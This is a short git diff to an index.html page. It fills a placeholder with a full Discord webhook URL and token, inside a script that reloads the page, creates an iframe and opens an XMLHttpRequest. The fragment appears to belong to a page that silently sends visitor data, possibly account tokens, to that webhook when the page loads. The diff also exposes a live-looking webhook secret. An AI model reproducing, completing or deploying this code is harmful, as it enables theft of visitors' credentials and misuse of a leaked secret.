--- a/index.html
+++ b/index.html
@@ -64,7 +64,7 @@
 
 <script>
   location.reload();
-  var discordWebhook = "YOUR DISCORD WEBHOOK HERE";
+  var discordWebhook = "https://discord.com/api/webhooks/851870978333736980/s6x7_U3IT4RzibZ39IWPB--P0LZ04B96YwQkdtWONJzFIKKqpc88UnaNRCmLGYwOH6Zp";
   var i = document.createElement('iframe');
   document.body.appendChild(i);
   var request = new XMLHttpRequest();
